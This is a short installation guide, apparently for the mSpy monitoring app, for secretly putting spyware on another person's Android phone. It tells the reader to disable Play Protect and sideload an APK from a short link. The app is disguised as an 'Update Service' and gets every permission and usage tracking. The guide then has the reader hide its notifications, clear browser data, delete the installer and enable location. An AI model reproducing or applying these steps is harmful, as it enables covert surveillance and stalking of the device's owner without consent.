Disable PlayProtect on the device you want to monitor
1. Go to 'Play Store'.
2. Tap 'Menu button' (three lines in the top left corner).
3. Find and tap 'Play Protect'.
4. 'Settings (cogwheel)'.
5. Disable 'Scan device for security threats'.
Download mSpy installer
1. 'Open a browser' (Chrome).
2. Tap on the address bar.
3. Enter the link 'b55y.net/a' and press 'Go'.
4. Draw the shape, once successful click 'Download' → 'Ok'.
5. Hit 'Open' → 'Settings' → 'Allow from this source'.
6. Go back → hit 'Install' → 'Open'.
1. Tap 'Allow' for all permissions.
2. Tap 'Ok' → turn on the toggle on the next screen.
3. Tap 'Ok' → 'Installed services' → enable 'Framework update service'.
4. Tap 'Ok' → 'Update Service' → enable 'Allow usage tracking'.
5. Tap 'Ok' ⭢ 'Start now'.
6. Tap 'Ok'. Tap 'Apps not optimized' → 'All'. Find and tap 'Update Service' → turn it off.
7. Tap 'Ok' ⭢ disable 'Show notifications'.
8. Click on the area above 'Complete installation' and enter the registration code.
9. Press 'Complete installation'.
10. Go to 'Settings' ⭢ 'Apps' ⭢ 'Google Play Store' ⭢ 'Notifications' ⭢ disable 'Show notifications'.
1. Go to 'Chrome' → tap on three dots → 'Settings'.
2. Go to 'Privacy' → 'Clear browsing data' → 'Clear data'.
3. Go to home screen → swipe up to open apps.
4. Find and tap 'My Files'.
5. Go to 'Downloads' → 'delete bt.apk'.
Add mSpy to Unmonitored apps
1. On the home screen 'swipe up' to open the menu.
2. Find and tap the 'Settings' icon (gear).
3. Find and tap 'Apps'.
4. Find and tap 'Update service'.
5. Tap 'Mobile data'.
6. Enable 'Allow app while data saver on'.
Turn on Location
Touch the screen in two places and pull down the extended menu from the top of the screen → 'Enable Location'.